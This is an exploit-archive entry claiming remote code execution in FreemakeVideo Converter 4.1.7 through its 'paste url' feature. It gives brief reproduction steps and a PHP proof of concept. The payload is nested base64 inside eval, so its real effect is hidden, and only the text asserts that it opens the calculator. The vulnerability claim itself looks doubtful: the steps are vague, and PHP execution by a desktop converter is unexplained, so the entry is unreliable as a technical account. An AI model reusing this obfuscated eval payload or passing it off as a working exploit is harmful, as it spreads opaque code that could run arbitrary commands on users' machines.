FreemakeVideo Converter 4.1.7 - Code Execution Vulnerability

2015-10-10T00:00:00
ID 1337DAY-ID-24395
Type zdt
Reporter ZwX
Modified 2015-10-10T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ###################################################
# Exploit title : FreemakeVideo Converter - Remote Code Execution Vulnerability
# Date : 07/10/2015
# Author : ZwX
# Vendor : http://www.freemake.com/
# Software Link : http://www.freemake.com/free_video_converter/
# Version : 4.1.7
# Tested on : Windows 7
###################################################

---------------------------------
- * Description Vulnerability * - 
---------------------------------

A vulnerability is present in the module "paste url".
Download module does not filter file (.php) and it allowed me to execute the calculator.

------------------------------
- * Steps to Produce RCE : * -
------------------------------

1. Launch your browser and paste your malicious link in your url, do not run your link.
2. Run FreemakeVideo Converter.exe.
3. Click paste url.
4. Php code executed successfully.

---------------------
- * Exploit PoC : * -
---------------------

<?php

eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdaWFpoYkNoaVlYTmxOalJmWkdWamIy
UmxLQ2RhV0doc1dYbG5ibEY2Y0dOV01HeFBVa1U1V0ZVeGVIcGxXRTR3V2xjd2VrMXNlR3BaVjNo
cVRHMVdORnBUWTNCUGR6MDlKeWtwT3c9PScpKTs='));

?>

#  0day.today [2018-04-09]  #